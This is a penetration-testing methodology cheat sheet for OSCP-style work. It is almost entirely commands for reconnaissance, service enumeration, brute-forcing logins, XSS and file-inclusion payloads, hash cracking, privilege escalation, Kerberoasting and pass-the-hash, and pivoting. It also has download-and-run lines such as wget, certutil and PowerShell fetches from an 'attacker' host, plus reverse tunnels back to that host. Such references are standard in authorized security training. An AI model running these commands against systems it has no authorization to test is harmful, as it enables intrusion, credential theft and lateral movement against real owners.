OSCP-METHODOLOGY
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Interactive tool: Pentest Report Builder
RECONNAISSANCE#
# Passive recon (no direct target interaction) whois target.com host target.com nslookup target.com dig target.com any theHarvester -d target.com -b google,bing # Google dorking: site:target.com filetype:pdf # Active recon ping -c 3 target.com traceroute target.com
PORT SCANNING#
# Fast initial scan nmap -sC -sV -oA nmap/initial target # Full TCP scan nmap -p- -sC -sV -oA nmap/full target # UDP scan (top ports) nmap -sU --top-ports 50 -oA nmap/udp target # Targeted script scan nmap -p 80,443 --script=http-enum,http-headers target # Aggressive scan nmap -A -T4 -p- target # Scan multiple targets nmap -iL targets.txt -oA nmap/all
SERVICE ENUMERATION BY PORT#
FTP (21)#
nmap --script=ftp-anon,ftp-bounce target -p 21 ftp target # Try anonymous login # Default creds: anonymous:anonymous
SSH (22)#
ssh user@target hydra -l user -P wordlist.txt ssh://target nmap --script=ssh-brute target -p 22
SMTP (25)#
nmap --script=smtp-enum-users,smtp-commands target -p 25 smtp-user-enum -M VRFY -U users.txt -t target
DNS (53)#
dig axfr @target target.com # Zone transfer dnsrecon -d target.com -t axfr dnsenum target.com
HTTP/HTTPS (80/443)#
# Directory enumeration gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt -x php,txt,html ffuf -u http://target/FUZZ -w /usr/share/wordlists/dirb/common.txt feroxbuster -u http://target -w common.txt # Technology detection whatweb http://target nikto -h http://target wappalyzer (browser extension) # CMS detection wpscan --url http://target # WordPress droopescan scan drupal -u http://target # Drupal # Virtual host enumeration gobuster vhost -u http://target -w subdomains.txt
SMB (139/445)#
smbclient -L //target -N # List shares (null session) smbclient //target/share -N # Connect to share smbmap -H target # Enumerate shares enum4linux -a target # Full enumeration crackmapexec smb target -u '' -p '' --shares # Nmap scripts nmap --script=smb-enum-shares,smb-enum-users,smb-vuln* target -p 445
SNMP (161)#
snmpwalk -v2c -c public target onesixtyone -c community.txt target snmp-check target
MYSQL (3306)#
mysql -h target -u root -p nmap --script=mysql-enum,mysql-brute target -p 3306
RDP (3389)#
xfreerdp /u:user /p:pass /v:target hydra -l admin -P wordlist.txt rdp://target nmap --script=rdp-vuln* target -p 3389
WINRM (5985)#
evil-winrm -i target -u user -p pass crackmapexec winrm target -u user -p pass
WEB APPLICATION TESTING#
# SQL Injection sqlmap -u "http://target/page?id=1" --batch --dbs sqlmap -r request.txt --batch --dbs # From Burp request # XSS testing <script>alert(1)</script> <img src=x onerror=alert(1)> <svg onload=alert(1)> # File inclusion http://target/page?file=../../../../../../etc/passwd http://target/page?file=php://filter/convert.base64-encode/resource=config # File upload bypass # Try: .php, .php5, .phtml, .phar, .PhP, .php.jpg # Content-Type manipulation # Magic bytes + PHP code
PASSWORD ATTACKS#
# Wordlists /usr/share/wordlists/rockyou.txt /usr/share/seclists/Passwords/ # Hydra hydra -l user -P rockyou.txt target ssh hydra -l admin -P rockyou.txt target http-post-form "/login:user=^USER^&pass=^PASS^:Invalid" # Hashcat hashcat -m 0 hash.txt rockyou.txt # MD5 hashcat -m 1000 hash.txt rockyou.txt # NTLM hashcat -m 1800 hash.txt rockyou.txt # SHA512crypt # John john --wordlist=rockyou.txt hash.txt john --show hash.txt
LINUX PRIVILEGE ESCALATION#
# Automated ./linpeas.sh ./linux-smart-enumeration.sh # Manual checks sudo -l # Sudo permissions find / -perm -4000 2>/dev/null # SUID binaries find / -perm -2000 2>/dev/null # SGID binaries cat /etc/crontab # Cron jobs ls -la /etc/cron* ps aux # Running processes netstat -tulnp # Listening services cat /etc/passwd # Users find / -writable -type f 2>/dev/null # Writable files getcap -r / 2>/dev/null # Capabilities env # Environment variables cat /etc/fstab # Mounted drives find / -name "*.bak" -o -name "*.old" -o -name "*.conf" 2>/dev/null # GTFOBins for SUID/sudo exploitation # https://gtfobins.github.io/
WINDOWS PRIVILEGE ESCALATION#
# Automated .\winPEAS.exe .\PowerUp.ps1; Invoke-AllChecks .\Seatbelt.exe -group=all # Manual checks whoami /priv # Current privileges whoami /groups # Group memberships net user # Local users net localgroup Administrators # Admin members systeminfo # OS info + patches wmic qfe list # Installed patches schtasks /query /fo LIST # Scheduled tasks sc query # Services icacls "C:\Program Files" # Permissions reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated # Unquoted service paths wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows" # Service permissions accesschk.exe -wuvc "service_name"
FILE TRANSFERS#
# Python HTTP server
python3 -m http.server 8000
# wget/curl
wget http://attacker/file -O /tmp/file
curl http://attacker/file -o /tmp/file
# certutil (Windows)
certutil -urlcache -split -f http://attacker/file file.exe
# PowerShell
Invoke-WebRequest -Uri http://attacker/file -OutFile file.exe
(New-Object Net.WebClient).DownloadFile('http://attacker/file','file.exe')
# SMB
impacket-smbserver share /tmp/share -smb2support
copy \\attacker\share\file.exe .
# SCP
scp file user@target:/tmp/
PIVOTING#
# SSH port forwarding ssh -L 8080:internal:80 user@pivot # Local forward ssh -R 8080:localhost:80 user@pivot # Remote forward ssh -D 9050 user@pivot # SOCKS proxy # Chisel # Server (attacker): chisel server --reverse -p 8000 # Client (target): chisel client attacker:8000 R:8080:internal:80 # Ligolo-ng # Proxy (attacker): ligolo-proxy -selfcert # Agent (target): ligolo-agent -connect attacker:11601 -retry
ACTIVE DIRECTORY#
# Enumeration bloodhound-python -d domain.local -u user -p pass -c all crackmapexec smb dc -u user -p pass --users ldapsearch -x -H ldap://dc -b "DC=domain,DC=local" # Kerberoasting GetUserSPNs.py domain/user:pass -dc-ip DC -request hashcat -m 13100 kerberoast.txt rockyou.txt # AS-REP Roasting GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC # Pass the Hash psexec.py domain/user@target -hashes :NTLM_HASH evil-winrm -i target -u user -H NTLM_HASH
REPORT WRITING TIPS#
# Structure: Executive Summary, Methodology, Findings, Remediation # Each finding: Title, Severity, Description, Impact, Steps to Reproduce, Remediation # Include screenshots with annotations # Document the full attack chain # Provide specific remediation for each finding